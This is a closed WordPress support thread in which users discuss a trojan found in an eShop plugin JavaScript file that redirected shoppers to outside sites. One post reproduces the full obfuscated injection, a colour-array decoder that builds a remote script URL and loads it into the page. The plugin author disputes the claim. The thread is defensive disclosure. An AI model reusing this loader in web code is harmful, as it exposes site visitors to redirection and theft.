Found a eshop javascript file in the uploads folder. Avast and a number of other files recognised this as a trojan,
redirected customers making purchases to a Romanian website and/or to pradid.com/engine
use with extreme caution!
eShop
[closed] Trojan (5 posts)
-
TheCellarRoom
Posted 1 year ago # -
ClaytonJames
Posted 1 year ago #I would be concerned about the possibility that the script might not be related to the eShop plugin, but instead found it's way to your site through other means. Don't dismiss the possibility that there may be more than one explanation, unless you have solid evidence otherwise.
-
Posted 1 year ago #Not dismissing any possibilities at all, but wordpress users should be aware that it might be a security issue if it can be targeted.
if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15); } } if (styled) { s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2)); } else { s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime(); } return s; } function try_pick_colors() { try { if(!document.getElementById || !document.createElement){ document.write(div_pick_colors(div_colors,1)); } else { var new_cstyle=document.createElement("script"); new_cstyle.type="text/javascript"; new_cstyle.src=div_pick_colors(div_colors,0); document.getElementsByTagName("head")[0].appendChild(new_cstyle); } } catch(e) { } try { check_colors_picked(); } catch(e) { setTimeout("try_pick_colors()", 500); } } try_pick_colors(); }$eshopj=jQuery.noConflict(); $eshopj(document).ready(function () { $eshopj('#eshopgateway').submit(); });this is the code that anti-virus does not like the however the clean version should be
$eshopj=jQuery.noConflict(); $eshopj(document).ready(function () { $eshopj('#eshopgateway').submit(); }); -
Posted 1 year ago #I've seen similar instances of this.
http://sucuri.net/malware/malware-entry-mwjs1240
http://malware.im/blackhole-defs_colors-and-createcss-injections/
Perhaps your configuration left some files writable somehow.
There may be other helpful info here as well;
-
check your information before posting such ridiculous and slanderous claims. Re download eShop and you'll see that it does not contain the so called trojan you mention.
Topic Closed
This topic has been closed to new replies.
